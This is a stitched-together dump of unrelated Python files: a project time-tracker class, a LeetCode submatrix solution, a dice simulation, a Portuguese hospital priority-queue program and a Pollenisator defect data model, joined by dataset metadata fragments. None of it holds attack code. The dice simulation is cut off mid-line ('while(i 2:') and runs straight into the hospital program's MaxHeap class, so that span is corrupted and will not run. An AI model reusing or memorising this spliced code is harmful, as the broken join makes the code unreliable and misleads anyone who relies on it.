\"\"\"\n\n backup_dir = os.path.join(get_base_path(), \"Backups\")\n\n if not os.path.exists(backup_dir):\n os.mkdir(backup_dir)\n\n backup_path = os.path.join(backup_dir, f\"backup-{self.__last_save_date().strftime('%m-%d-%Y')}.json\")\n try:\n with open(backup_path, 'w') as f:\n f.write(json.dumps(self.__dict, indent=4))\n return backup_path\n except Exception as e:\n print(f\"An error occurred when trying to create a backup projects: {e}\")\n return False\n\n def restore_backup(self, backup_path):\n \"\"\"\n Restores the projects file from a backup. 
Overwrites the current projects file.\n :param backup_path:\n :return: True if the backup was restored successfully, False if an error occurred\n \"\"\"\n\n # check if the backup file exists\n if not os.path.exists(backup_path):\n print(f\"Backup file does not exist: {backup_path}\")\n return False\n\n # load the backup file\n with open(backup_path, 'r') as f:\n backup = json.load(f)\n # check if the backup is compressed and decompress it if it is\n if ZIPJSON_KEY in backup:\n backup = json_unzip(backup)\n\n self.__dict = backup # overwrite the current projects file with the backup\n self.__save()\n return True\n\n # method to sync projects with a remote server or local file\n def sync(self, filepath):\n \"\"\"\n Sync projects with a local file. Projects from both files will be merged and both files will be updated.\n :param filepath: the path to the remote file (a .json file)\n :return: True if the sync was successful, False if an error occurred\n \"\"\"\n # check if the path is accessible\n try:\n if not os.path.exists(filepath):\n if not os.path.isdir(os.path.dirname(filepath)):\n os.makedirs(os.path.dirname(filepath))\n with open(filepath, 'w'):\n pass\n\n with open(filepath, 'r'):\n pass\n except Exception as e:\n print(f\"An error occurred when trying to access the remote file: {e}\")\n return False\n\n print(f\"Syncing projects with file: {filepath}\")\n\n # backup current projects\n backup_path = self.backup()\n if backup_path:\n print(f\"Backup created: {backup_path}\")\n else:\n print(\"Failed to create backup! Sync aborted!\")\n return False\n\n is_compressed = False\n\n # get the data from the remote file\n try:\n with open(filepath, 'r') as f:\n remote_data = {}\n if os.stat(filepath).st_size != 0: # if the file is not empty, load the data\n remote_data = json.load(f)\n is_compressed = ZIPJSON_KEY in remote_data\n # check if remote file is compressed and unzip it if so\n if is_compressed:\n remote_data = json_unzip(remote_data)\n except Exception as e:\n print(f\"An error occurred when trying to open the remote file: {e}\")\n return False\n\n # use the merge method to merge the remote projects with the local projects\n for project in {**self.__dict, **remote_data}: # combine the project keys of both dicts\n if project in self.get_keys() and project in remote_data.keys():\n self.merge(self.__dict[project], remote_data[project],\n project) # the project have the same name, so they will be merged into one project\n print(format_text(f\"[yellow]{project}[reset] already exists, merging...\"))\n elif project not in remote_data.keys():\n print(format_text(f\"[green]{project}[reset] not found in remote file, adding...\"))\n else:\n self.__dict[project] = remote_data[project] # otherwise just add the project to the local projects\n print(format_text(f\"[green]{project}[reset] added to projects\"))\n\n # save the local projects\n self.__save()\n\n # update remote file\n try:\n with open(filepath, 'w') as f:\n # compress the data before writing it to the file if the file was originally compressed\n if is_compressed:\n f.write(json.dumps(json_zip(self.__dict)))\n else: # otherwise just write the data to the file\n f.write(json.dumps(self.__dict, indent=4))\n except Exception as e:\n print(f\"An error occurred when trying to update the remote file: {e}\")\n return False\n\n print(f\"Sync successful!\")\n return True\n\n @staticmethod\n def __remove_duplicate_sessions(project: dict):\n \"\"\"\n Private method that removes duplicate sessions from a project.\n Duplicate sessions are sessions 
with the same name, date, start-time, end-time, and duration.\n :param project: name of the project to remove duplicates from\n \"\"\"\n if not project:\n return\n\n project['Total Time'] = 0\n for sub in project['Sub Projects']:\n project['Sub Projects'][sub] = 0\n\n seen = set() # use a set to keep track of unique sessions\n new_session_history = [] # create a new session history\n\n for session in project['Session History']:\n # create a tuple with the values of the keys used to determine uniqueness\n key = (session['Date'], session['Start Time'], session['End Time'], tuple(session['Sub-Projects']))\n if key not in seen: # if the tuple is not in the set, add it and add the session to the new session history\n seen.add(key)\n new_session_history.append(session)\n\n project['Session History'] = new_session_history # set the new session history\n\n # sum up total time from session histories\n for session in project['Session History']:\n project['Total Time'] += float(session['Duration'])\n for sub in project['Sub Projects']:\n if sub in session['Sub-Projects']:\n project['Sub Projects'][sub] += round(float(session['Duration']))\n\n project['Total Time'] = round(project['Total Time'], 2)\n return project # update the project in the projects dict\n\n def log(self, projects=\"all\", fromDate=None, toDate=None, status=None, sessionNotes=True, noteLength=300):\n \"\"\"\n Print the session histories of projects over a given period.\n\n :param projects: list of project names to print session history.\n :param fromDate: date to start printing logs from in the format of MM-DD-YYY\n :param toDate: date to stop printing logs at in the format of MM-DD-YYY\n :param status: filter logged projects by status. Log either 'active', 'paused', or 'completed' projects\n :param sessionNotes: show session notes. True will print session notes, False will not.\n :param noteLength: maximum note length that can be printed before the note is replaced with an ellipse (...)\n \"\"\"\n\n valid_projects = []\n keys = self.get_keys()\n\n if str(projects).lower() == 'all':\n valid_projects = keys\n if status and status in self.__status_tags:\n valid_projects = [key for key in keys if self.__dict[key]['Status'] == status]\n else:\n for prjct in projects:\n if prjct not in keys:\n print(format_text(f\"Invalid project name! '[bright red]{prjct}[reset]' does not exist!\"))\n else:\n valid_projects.append(prjct)\n\n dates = listOfDates(fromDate, toDate)\n\n if not dates:\n print(format_text(f'Invalid input! 
End date [cyan]\"{toDate}\"[reset] cannot be earlier '\n f'than start date [cyan]\"{fromDate}\"[reset].'))\n return\n\n # create a sessions list\n sessions_list = [(project, self.__dict[project][\"Session History\"]) for project in valid_projects]\n cleaned_sessions = []\n\n for project, session_list in sessions_list:\n for session in session_list:\n if session[\"Date\"] in dates:\n cleaned_sessions.append((project, session))\n\n # sort sessions list by end time\n session_list = sorted(cleaned_sessions, key=lambda x: datetime.strptime(x[1][\"End Time\"], \"%H:%M:%S\"))\n\n # Sort session_list by date\n session_list.sort(key=lambda x: datetime.strptime(x[1]['Date'], \"%m-%d-%Y\"))\n\n def format_time(time):\n if time.hour > 0:\n time = time.strftime(\"%Hh %Mm\")\n else:\n time = time.strftime(\"%Mm %Ss\")\n return time\n\n def truncate_note(nte, nteLength):\n if len(nte) > nteLength:\n nte = nte[0: nte.find(\" \")] + \"[red].[green].[blue].[yellow] \" + nte[nte.rfind(\" \"):]\n # differentiate truncations from normal ellipses by adding color (RGB)\n return nte\n\n # Initialize variables\n current_date = None\n print_output = \"\"\n day_total = 0.0\n\n def print_date_output(crrnt_date, d_total):\n print_date = datetime.strptime(crrnt_date, \"%m-%d-%Y\")\n print_date = print_date.strftime(\"%A %d %B %Y\")\n d_total = str(timedelta(minutes=d_total)).split(\".\")[0]\n d_total = datetime.strptime(d_total, \"%H:%M:%S\")\n d_total = format_time(d_total)\n\n print(format_text(f\"[underline]{print_date}[reset]\"\n f\" [_text256_34_]({d_total})[reset]\"))\n\n # Iterate over sessions\n for project, session in reversed(session_list):\n # Check if date has changed\n if current_date != session['Date']:\n # Print output for previous date\n if current_date is not None:\n print_date_output(current_date, day_total)\n print(print_output)\n\n # Reset variables for new date\n current_date = session['Date']\n print_output = \"\"\n day_total = 0.0\n\n # Calculate time spent and add to day total\n time_spent = str(timedelta(minutes=session['Duration'])).split(\".\")[0]\n time_spent = datetime.strptime(time_spent, \"%H:%M:%S\")\n day_total += session['Duration']\n time_spent = format_time(time_spent)\n\n # Format subprojects and note\n sub_projects = [f\"[_text256_26_]{sub_proj}[reset]\" for sub_proj in session['Sub-Projects']]\n note = truncate_note(session['Note'], noteLength)\n\n # Add session details to print output\n print_output += format_text(f\"[cyan]{session['Start Time']}[reset] to \"\n f\"[cyan]{session['End Time']}[reset] \\t\"\n f\"{time_spent} \"\n f\"[bright red]{project}[reset] \"\n f\"{sub_projects} \" +\n (f\" -> [yellow]{note}[reset]\\n\" if note != \"\" and sessionNotes else \"\\n\")\n )\n\n # Print output for last date\n if current_date is not None:\n print_date_output(current_date, day_total)\n print(print_output)\n\n def get_totals(self, projects=\"all\", status=None):\n \"\"\"\n Print the time spent totals and subtotals for given projects.\n\n :param projects: list of project names to show time totals.\n :param status: filter logged projects by status. Log either 'active', 'paused', or 'completed' projects\n \"\"\"\n valid_projects = []\n keys = self.get_keys()\n\n if str(projects).lower() == 'all':\n valid_projects = keys\n if status and status in self.__status_tags:\n valid_projects = [key for key in keys if self.__dict[key]['Status'] == status]\n else:\n for prjct in projects:\n if prjct not in keys:\n print(f\"Invalid project name! 
'{prjct}' does not exist!\")\n                else:\n                    valid_projects.append(prjct)\n\n        for prj in valid_projects:\n            td = timedelta(minutes=self.__dict[prj]['Total Time'])\n            startDate = datetime.strptime(self.__dict[prj]['Start Date'], \"%m-%d-%Y\")\n            endDate = datetime.strptime(self.__dict[prj]['Last Updated'], \"%m-%d-%Y\")\n            startDate = startDate.strftime(\"%d %B %Y\")\n            endDate = endDate.strftime(\"%d %B %Y\")\n            print(format_text(f\"[bright red]{prj}[reset]: [_text256_34_]{td_str(td)}[reset] \"\n                              f\"([cyan]{startDate}[reset] -> [cyan]{endDate}[reset])\"))\n\n            sub_ls = list(self.__dict[prj][\"Sub Projects\"])\n            length = len(sub_ls)\n\n            for i in range(length):\n                sub = sub_ls[i]\n                sub_td = timedelta(minutes=self.__dict[prj][\"Sub Projects\"][sub])\n\n                if i == length - 1:\n                    print(format_text(f\"└───[_text256_26_]{sub}[reset]: {td_str(sub_td)}\"))\n                else:\n                    print(format_text(f\"├───[_text256_26_]{sub}[reset]: {td_str(sub_td)}\"))\n            sess_count = len(self.__dict[prj][\"Session History\"])\n            if sess_count > 0:\n                print(format_text(f\"*[_text256]Session Count: {sess_count}[reset]\\n\"\n                                  f\"*[_text256]Average duration: {td_str(td / sess_count)}[reset]\", 66))\n            print(\"\")\n\n    def complete_project(self, name):\n        \"\"\"\n        :param name: project name\n        Mark a project as completed\n        \"\"\"\n\n        if name not in self.__dict:\n            print(f\"Invalid project name! '{name}' does not exist!\")\n            return\n\n        self.__dict[name][\"Status\"] = self.__status_tags[2]\n        self.__save()\n\n    def pause_project(self, name):\n        \"\"\"\n        :param name: project name\n        Mark a project as paused\n        \"\"\"\n\n        if name not in self.__dict:\n            print(f\"Invalid project name! '{name}' does not exist!\")\n            return\n\n        self.__dict[name][\"Status\"] = self.__status_tags[1]\n        self.__save()\n\n    def mark_project_active(self, name):\n        \"\"\"\n        :param name: project name\n        Mark a project as active\n        \"\"\"\n\n        if name not in self.__dict:\n            print(f\"Invalid project name! 
'{name}' does not exist!\")\n            return\n\n        self.__dict[name][\"Status\"] = self.__status_tags[0]\n        self.__save()\n\n    def __sort_dict(self):\n        \"\"\"\n        Sort the dictionary by key (project name) in alphabetical order.\n        Also call __remove_duplicate_sessions() to remove duplicate sessions when sorting.\n        :return:\n        \"\"\"\n        sorted_keys = sorted(self.get_keys(), key=lambda x: x.lower())\n        sorted_dict = {}\n\n        for key in sorted_keys:\n            # also remove duplicate sessions when sorting\n            sorted_dict[key] = self.__remove_duplicate_sessions(self.__dict[key])\n\n        self.__dict = sorted_dict\n\n    def __save(self):\n        self.__sort_dict()\n\n        # compress and dump json data\n        prjct_json = json.dumps(json_zip(self.__dict))\n        with open(self.path, \"w\") as json_writer:\n            json_writer.write(prjct_json)\n\n    def __load(self):\n        if not os.path.exists(self.path):\n            return\n        projects = open(self.path, \"r\").read()\n\n        try:\n            # load and decompress json data\n            self.__dict = json_unzip(json.loads(projects))\n        except Exception:\n            # load an uncompressed file\n            self.__dict = json.loads(projects)\n\n        for project in self.__dict:\n            if \"Status\" not in self.__dict[project]:\n                self.__dict[project][\"Status\"] = self.__status_tags[0]\n\n        self.__sort_dict()\n\n    def export_project(self, name: str, filename: str):\n        \"\"\"\n        Export projects to .json files.\n\n        Files are saved in the 'Exported' folder within the base directory.\n        Has to end in .json.\n        If extension isn't added, it will be added by the function.\n\n        :param name: name of existing project to be exported\n        :param filename: filename to save project in.\n\n        \"\"\"\n        if name not in self.__dict:\n            print(f\"Invalid project name! '{name}' does not exist!\")\n            return\n\n        if not os.path.isdir(self.exported_path):\n            os.mkdir(self.exported_path)\n\n        path = os.path.join(self.exported_path, filename)\n\n        if os.path.exists(path):\n            file_contents = open(path, \"r\").read()\n            file_dict = json.loads(file_contents)\n        else:\n            file_dict = {}\n\n        file_dict[name] = self.__dict[name]\n\n        prjct_json = json.dumps(file_dict, indent=4)\n\n        with open(path, \"w\") as json_writer:\n            json_writer.write(prjct_json)\n\n        self.delete_project(name)\n\n    def load_exported(self, filename: str, project_name=\"\"):\n        \"\"\"\n        Import previously exported projects.\n\n        :param filename: filename to save project in.\n        :param project_name: name of the project to import from the file\n\n        \"\"\"\n        path = os.path.join(self.exported_path, filename)\n\n        if os.path.exists(path):\n            projects = open(path, \"r\").read()\n            if project_name != \"\" and project_name != \"all\":\n                if project_name not in self.__dict.keys():\n                    try:\n                        self.__dict[project_name] = json.loads(projects)[project_name]\n                        print(\n                            format_text(f\"Imported [yellow]{project_name}[reset] from '{filename}'\"))\n                    except KeyError:\n                        print(format_text(f\"\\n[yellow]{project_name}[reset] cannot be found in '{path}'\"))\n                        print(\"Here are all the projects that were found: \")\n                        for itr, name in enumerate(json.loads(projects)):\n                            print(format_text(f\"[yellow]{itr + 1}.{name}[reset]\"))\n\n                else:\n                    print(format_text(f\"Conflict error! \"\n                                      f\"Cannot import [yellow]{project_name}[reset] as it already exists!\"))\n\n            elif project_name == \"all\":\n                temp_dict = json.loads(projects)\n                for project in temp_dict:\n                    if project not in self.__dict:\n                        self.__dict[project] = temp_dict[project]\n                        print(\n                            format_text(f\"Imported [yellow]{project}[reset] from '{filename}'\"))\n                    else:\n                        print(format_text(f\"Conflict error! 
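# __save()/__load() above round-trip the whole project dict through
# json_zip/json_unzip, with ZIPJSON_KEY marking compressed payloads.
# compress_json itself is not shown in this file, so the following is a
# hedged, self-contained sketch of what such a pair plausibly looks like
# (zlib + base64 under a marker key). The key string below is a
# placeholder, not necessarily the library's real constant.
import base64
import json
import zlib

ZIPJSON_KEY = 'base64(zip(o))'  # assumed marker key

def json_zip(obj):
    # Serialize, compress, then base64-encode so the payload stays text-safe.
    packed = base64.b64encode(zlib.compress(json.dumps(obj).encode('utf-8')))
    return {ZIPJSON_KEY: packed.decode('ascii')}

def json_unzip(obj):
    # Pass uncompressed dicts through unchanged, mirroring __load's fallback.
    if ZIPJSON_KEY not in obj:
        return obj
    return json.loads(zlib.decompress(base64.b64decode(obj[ZIPJSON_KEY])))

assert json_unzip(json_zip({'Demo': {'Total Time': 42.0}})) == {'Demo': {'Total Time': 42.0}}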
\"\n f\"Cannot import [yellow]{project}[reset] as it already exists!\"))\n self.__save()\n\n else:\n print(f\"'{path}' does not exist!\")\n","repo_name":"Fingolfin7/Autumn","sub_path":"Source/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":34519,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"31189514837","text":"#\n# @lc app=leetcode.cn id=363 lang=python3\n#\n# [363] 矩形区域不超过 K 的最大数值和\n#\n\n# @lc code=start\nfrom typing import List\nclass Solution:\n def maxSumSubmatrix(self, matrix: List[List[int]], k: int) -> int:\n m, n = len(matrix), len(matrix[0])\n from sortedcontainers import SortedList\n res = float(\"-inf\")\n for top in range(m):\n rowCompress = [0] * n # 列的和\n for bot in range(top, m):\n for c in range(n):\n rowCompress[c] += matrix[bot][c]\n totalSet = SortedList([0])\n s = 0\n for v in rowCompress:\n s += v\n lb = totalSet.bisect_left(s - k)\n if lb != len(totalSet):\n res = max(res, s-totalSet[lb])\n totalSet.add(s)\n\n return res\n\n\"\"\"\nAccepted\n27/27 cases passed (2968 ms)\nYour runtime beats 14.28 % of python3 submissions\nYour memory usage beats 52.48 % of python3 submissions (15.8 MB)\n\"\"\"\n\n# @lc code=end\n\n","repo_name":"Interesting6/FuckLeetCode","sub_path":"363.矩形区域不超过-k-的最大数值和.py","file_name":"363.矩形区域不超过-k-的最大数值和.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39817151745","text":"import random\nfrom scipy.stats import shapiro\n\ndist = 0\nthrows = 7\nALL_SIMULATIONS = 100000\nall_sum = []\nX = []\ndystrybuant = []\nall_means = []\nall_sums_count = []\nTRAILS = 100\n\ndef random_simulation(throws):\n move = []\n i = 0\n while(i 2:\r\n self.__swap(1, len(self.heap) - 1)\r\n max = self.heap.pop()\r\n self.__bubbleDown(1)\r\n elif len(self.heap) == 2:\r\n max = self.heap.pop()\r\n else:\r\n max = False\r\n return max\r\n\r\n def peek(self):\r\n if self.heap[1]:\r\n return self.heap[1] # retorna primeiro valor raiz (root)\r\n return False\r\n\r\n def __swap(self, i, j):\r\n self.heap[i], self.heap[j] = self.heap[j], self.heap[i] # troca as posições i e j entre elas\r\n\r\n def __floatUp(self, index):\r\n parent = index//2 # identifica o pai\r\n if index <= 1: # nao faz nada se for raiz\r\n return\r\n elif self.heap[index] > self.heap[parent]:\r\n self.__swap(index, parent) # troca as posições index e parent entre elas\r\n self.__floatUp(parent) # recursividade: ...\r\n\r\n def __bubbleDown(self, index):\r\n left = index * 2\r\n right = index * 2 + 1\r\n maior = index\r\n if len(self.heap) > left and self.heap[maior] < self.heap[left]:\r\n maior = left\r\n if len(self.heap) > right and self.heap[maior] < self.heap[right]:\r\n maior = right\r\n\r\n if maior != index:\r\n self.__swap(index, maior)\r\n self.__bubbleDown(maior)\r\n\r\nclass Paciente:\r\n def __init__(self, nomeCompleto, tipoSanguineo, dataNasciamento):\r\n self.nomeCompleto = nomeCompleto\r\n self.tipoSanguineo = tipoSanguineo\r\n self.dataNascimento = dataNasciamento\r\n\r\n def __str__(self):\r\n return f\"Paciente: {self.nomeCompleto}, de tipo sanguíneo: {self.tipoSanguineo}, nascido na data: {self.dataNascimento}\"\r\n\r\ndef imprimirChamado(lista):\r\n lista.reverse() # inverter lista para obter os ultimos adicionados\r\n if len(lista) > 5:\r\n for i in range(0, 5):\r\n print(f\"{i+1}: {lista[i]}\") # valores dentro dos ultimos 5 adicionados\r\n else:\r\n for i in range(0, len(lista)):\r\n 
print(f\"{i+1}: {lista[i]}\") # valores dentro dos ultimos adicionados (< 5)\r\n\r\n\r\nfilaPrioridade = MaxHeap() \r\nlistaAux = [] # Lista auxiliar para os pacientes já chamados\r\nordem = 999 # Ordem dos chamados (de forma decrescente)\r\n\r\nwhile(True):\r\n\r\n try:\r\n print(\r\n \"============================================\",\r\n \"\\n1) Adicionar novo paciente\",\r\n \"\\n2) Chamar próximo paciente\",\r\n \"\\n3) Mostrar próximo paciente (sem chamar)\",\r\n \"\\n4) Listar os 5 últimos chamados\",\r\n \"\\n5) Sair\",\r\n \"\\n============================================\"\r\n )\r\n\r\n op = int(input(\"Opção: \"))\r\n os.system('cls')\r\n\r\n if op == 1:\r\n\r\n nomePaciente = input(\"Nome do paciente: \")\r\n tipoSanguineo = input(\"Tipo sanguíneo do paciente: \")\r\n dataNascimento = input(\"Data de nascimento do paciente: \")\r\n prioridade = int(input(\"Prioridade do paciente: \"))\r\n\r\n if(prioridade < 1 or prioridade > 10):\r\n \r\n print(\"Valor inválido para prioridade, tente novamente...\")\r\n continue\r\n\r\n novoPaciente = Paciente(nomePaciente, tipoSanguineo, dataNascimento) # Novo paciente\r\n ticket = (prioridade, ordem, novoPaciente) # Ticket para espera\r\n\r\n filaPrioridade.put(ticket) # Ticket é posto dentro da fila de espera\r\n ordem -= 1\r\n \r\n elif op == 2:\r\n\r\n print(filaPrioridade.heap[1][2]) # Primeiro paciente com máxima prioridade\r\n listaAux.append(filaPrioridade.heap[1][2]) # Paciente adicionado na lista auxiliar\r\n filaPrioridade.get() # Paciente extraído da fila\r\n print(\"Paciente retirado da fila de espera\")\r\n \r\n elif op == 3:\r\n\r\n print(filaPrioridade.heap[1][2]) # Primeiro paciente com máxima prioridade\r\n \r\n elif op == 4:\r\n\r\n imprimirChamado(listaAux)\r\n\r\n elif op == 5:\r\n\r\n print(\"Encerramento do programa\")\r\n break\r\n\r\n else:\r\n print(\"Valor inválido, tente novamente...\")\r\n continue\r\n\r\n except IndexError:\r\n os.system('cls')\r\n print(\"Fila vazia!\")\r\n except ValueError:\r\n os.system('cls')\r\n print(\"Valor inválido, tente novamente...\")\r\n\r\n\r\n","repo_name":"RhodrigoLopesPicinini/FilaHospitalEmergencia","sub_path":"FilaHospital.py","file_name":"FilaHospital.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38291370206","text":"\"\"\"Defect Model.\"\"\"\n\nimport os\nfrom bson.objectid import ObjectId\nfrom pollenisatorcli.core.Models.Element import Element\nfrom pollenisatorcli.core.apiclient import APIClient\n\n\nclass Defect(Element):\n \"\"\"\n Represents a Defect object that defines a security defect. A security defect is a note added by a pentester on a port or ip which describes a security defect.\n\n Attributes:\n coll_name: collection name in pollenisator database\n \"\"\"\n coll_name = \"defects\"\n\n def __init__(self, valuesFromDb=None):\n \"\"\"Constructor\n Args:\n valueFromDb: a dict holding values to load into the object. 
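# The hospital-queue program above hand-rolls an array-based MaxHeap plus a
# decreasing 'ordem' counter so that equal priorities are served first-come,
# first-served. A hedged sketch of the same behaviour on the stdlib heapq
# (a min-heap, hence the negated priority and an increasing counter); the
# names below are illustrative, not from the original file.
import heapq
import itertools

fila = []
contador = itertools.count()  # increasing counter replaces the decreasing 'ordem'

def adicionar(prioridade, paciente):
    # Higher prioridade pops first; equal priorities pop in arrival order.
    heapq.heappush(fila, (-prioridade, next(contador), paciente))

def chamar():
    return heapq.heappop(fila)[2]

adicionar(5, 'Ana')
adicionar(9, 'Bruno')
adicionar(9, 'Carla')
assert chamar() == 'Bruno'
assert chamar() == 'Carla'  # same priority as Bruno, but arrived later
assert chamar() == 'Ana'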
A mongo fetched defect is optimal.\n possible keys with default values are : _id (None), parent (None), tags([]), infos({}),\n ip(\"\"), port(\"\"), proto(\"\"), title(\"\"), ease(\"\"), impact(\"\"), risk(\"\"),\n redactor(\"N/A\"), type([]), notes(\"\"), proofs([]), index(None)\n \"\"\"\n if valuesFromDb is None:\n valuesFromDb = {}\n self.proofs = []\n super().__init__(valuesFromDb.get(\"_id\", None), valuesFromDb.get(\"parent\", None), valuesFromDb.get(\n \"tags\", []), valuesFromDb.get(\"infos\", {}))\n self.initialize(valuesFromDb.get(\"ip\", \"\"), valuesFromDb.get(\"port\", \"\"),\n valuesFromDb.get(\n \"proto\", \"\"), valuesFromDb.get(\"title\", \"\"),\n valuesFromDb.get(\"ease\", \"\"), valuesFromDb.get(\n \"impact\", \"\"),\n valuesFromDb.get(\n \"risk\", \"\"), valuesFromDb.get(\"redactor\", \"N/A\"), list(valuesFromDb.get(\"type\", [])),\n valuesFromDb.get(\"notes\", \"\"), valuesFromDb.get(\"proofs\", []), valuesFromDb.get(\"infos\", {}),\n valuesFromDb.get(\"index\", \"0\"))\n\n def initialize(self, ip, port, proto, title=\"\", ease=\"\", impact=\"\", risk=\"\", redactor=\"N/A\", mtype=None, notes=\"\", proofs=None, infos=None, index=\"0\"):\n \"\"\"Set values of defect\n Args:\n ip: defect will be assigned to this IP, can be empty\n port: defect will be assigned to this port, can be empty but requires an IP.\n proto: protocol of the assigned port. tcp or udp.\n title: a title for this defect describing what it is\n ease: ease of exploitation for this defect described as a string \n impact: impact the defect has on system. Described as a string \n risk: the combination of impact/ease gives a resulting risk value. Described as a string\n redactor: A pentester that waill be the redactor for this defect.\n mtype: types of this security defects (Application, data, etc...). Default is None\n notes: notes took by pentesters\n proofs: a list of proof files, default to None.\n infos: a dictionnary with key values as additional information. Default to None\n index: the index of this defect in global defect table (only for unassigned defect)\n Returns:\n this object\n \"\"\"\n self.title = title\n self.ease = ease\n self.impact = impact\n self.risk = risk\n self.redactor = redactor\n self.mtype = mtype if mtype is not None else []\n self.notes = notes\n self.ip = ip\n self.port = port\n self.proto = proto\n self.infos = infos if infos is not None else {}\n self.proofs = proofs if proofs is not None else []\n self.index = index\n return self\n\n @classmethod\n def getRisk(cls, ease, impact):\n \"\"\"Dict to find a risk level given an ease and an impact.\n Args:\n ease: ease of exploitation of this defect as as tring\n impact: the defect impact on system security\n Returns:\n A dictionnary of dictionnary. First dict keys are eases of exploitation. 
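# Defect.__init__/initialize above follow a common hydration pattern: every
# field comes out of the fetched document via .get() with a safe default,
# and mutable values are copied rather than aliased. A stripped-down sketch
# of that pattern (class and field names here are hypothetical):
class Record:
    def __init__(self, values_from_db=None):
        values_from_db = values_from_db if values_from_db is not None else {}
        self.title = values_from_db.get('title', '')
        # list(...) copies the stored value so later edits don't mutate the source dict
        self.mtype = list(values_from_db.get('type', []))

r = Record({'title': 'XSS', 'type': ['Application']})
assert (r.title, r.mtype) == ('XSS', ['Application'])
assert Record().mtype == []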
Second key are impact strings.\n \"\"\"\n risk_from_ease = {\"Easy\": {\"Minor\": \"Major\", \"Important\": \"Major\", \"Major\": \"Critical\", \"Critical\": \"Critical\"},\n \"Moderate\": {\"Minor\": \"Important\", \"Important\": \"Important\", \"Major\": \"Major\", \"Critical\": \"Critical\"},\n \"Difficult\": {\"Minor\": \"Minor\", \"Important\": \"Important\", \"Major\": \"Major\", \"Critical\": \"Major\"},\n \"Arduous\": {\"Minor\": \"Minor\", \"Important\": \"Minor\", \"Major\": \"Important\", \"Critical\": \"Important\"}}\n return risk_from_ease.get(ease, {}).get(impact, \"N/A\")\n\n def delete(self):\n \"\"\"\n Delete the defect represented by this model in database.\n \"\"\"\n ret = self._id\n apiclient = APIClient.getInstance()\n return apiclient.delete(\"defects\", ret)\n\n def addInDb(self):\n \"\"\"\n Add this defect to pollenisator database.\n Returns: a tuple with :\n * bool for success\n * mongo ObjectId : already existing object if duplicate, create object id otherwise \n \"\"\"\n apiclient = APIClient.getInstance()\n base = self.getDbKey()\n base[\"notes\"] = self.notes\n base[\"ease\"] = self.ease\n base[\"impact\"] = self.impact\n base[\"risk\"] = self.risk\n base[\"redactor\"] = self.redactor\n base[\"type\"] = list(self.mtype)\n base[\"proofs\"] = self.proofs\n if self.index is not None:\n base[\"index\"] = str(self.index)\n res, id = apiclient.insert(\"defects\", base)\n if not res:\n return False, id\n self._id = id\n return True, id\n\n \n\n def update(self, pipeline_set=None):\n \"\"\"Update this object in database.\n Args:\n pipeline_set: (Opt.) A dictionnary with custom values. If None (default) use model attributes.\n \"\"\"\n apiclient = APIClient.getInstance()\n if pipeline_set is None:\n apiclient.update(\"defects\", ObjectId(self._id), {\"ip\": self.ip, \"title\": self.title, \"port\": self.port,\n \"proto\": self.proto, \"notes\": self.notes, \"ease\": self.ease, \"impact\": self.impact,\n \"risk\": self.risk, \"redactor\": self.redactor, \"type\": list(self.mtype), \"proofs\": self.proofs, \"infos\": self.infos, \"index\":str(self.index)})\n else:\n apiclient.update(\"defects\", ObjectId(self._id), pipeline_set)\n\n def _getParentId(self):\n \"\"\"\n Return the mongo ObjectId _id of the first parent of this object. 
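# The ease/impact matrix in getRisk above is easy to exercise in isolation:
# the chained .get() calls make any unknown ease or impact degrade to "N/A"
# instead of raising. A self-contained restatement of the same table:
def get_risk(ease, impact):
    risk_from_ease = {
        "Easy": {"Minor": "Major", "Important": "Major", "Major": "Critical", "Critical": "Critical"},
        "Moderate": {"Minor": "Important", "Important": "Important", "Major": "Major", "Critical": "Critical"},
        "Difficult": {"Minor": "Minor", "Important": "Important", "Major": "Major", "Critical": "Major"},
        "Arduous": {"Minor": "Minor", "Important": "Minor", "Major": "Important", "Critical": "Important"},
    }
    return risk_from_ease.get(ease, {}).get(impact, "N/A")

assert get_risk("Easy", "Major") == "Critical"
assert get_risk("Arduous", "Critical") == "Important"
assert get_risk("Unknown", "Major") == "N/A"  # unknown ease falls through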
For a Defect it is either an ip or a port depending on the Defect's level.\n\n Returns:\n Returns the parent's ObjectId _id\".\n \"\"\"\n try:\n port = self.port\n except AttributeError:\n port = None\n \n apiclient = APIClient.getInstance()\n if port is None:\n port = \"\"\n if port == \"\":\n obj = apiclient.find(\"ips\", {\"ip\": self.ip}, False)\n else:\n obj = apiclient.find(\n \"ports\", {\"ip\": self.ip, \"port\": self.port, \"proto\": self.proto}, False)\n return obj[\"_id\"]\n\n def calcDirPath(self):\n \"\"\"Returns a directory path constructed for this defect.\n Returns:\n path as string\n \"\"\"\n apiclient = APIClient.getInstance()\n path_calc = str(apiclient.getCurrentPentest())+\"/\"+str(self.ip)\n try:\n port = self.port\n except AttributeError:\n port = None\n if port is not None:\n path_calc += \"/\"+str(self.port)+\"_\"+str(self.proto)\n path_calc += \"/\"+str(self._id)\n return path_calc\n\n def uploadProof(self, proof_local_path):\n \"\"\"Upload the given proof file to the server\n Args:\n proof_local_path: a path to a local proof file\n Returns:\n the basename of the file \n \"\"\"\n apiclient = APIClient.getInstance()\n apiclient.putProof(self._id, proof_local_path)\n return os.path.basename(proof_local_path)\n\n def getProof(self, ind):\n \"\"\"Download the proof file at given proof index\n Returns:\n A string giving the local path of the downloaded proof\n \"\"\"\n apiclient = APIClient.getInstance()\n current_dir = os.path.dirname(os.path.realpath(__file__))\n local_path = os.path.join(current_dir, \"../../results\", self.calcDirPath())\n try:\n os.makedirs(local_path)\n except FileExistsError:\n pass\n local_path = os.path.join(local_path, self.proofs[ind])\n ret = apiclient.getProof(self._id, self.proofs[ind], local_path)\n return ret\n\n def removeProof(self, ind):\n \"\"\"Removes the proof file at given proof index\n \"\"\"\n apiclient = APIClient.getInstance()\n filename = self.proofs[ind]\n ret = apiclient.rmProof(self._id, filename)\n del self.proofs[ind]\n return ret\n\n def __str__(self):\n \"\"\"\n Get a string representation of a defect.\n\n Returns:\n Returns the defect +title.\n \"\"\"\n return self.title\n\n def getDetailedString(self):\n \"\"\"Returns a detailed string describing for this defect.\n Returns:\n the defect title. 
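# calcDirPath above derives a per-defect results directory: <pentest>/<ip>,
# an extra <port>_<proto> segment for port-level defects, then the defect id.
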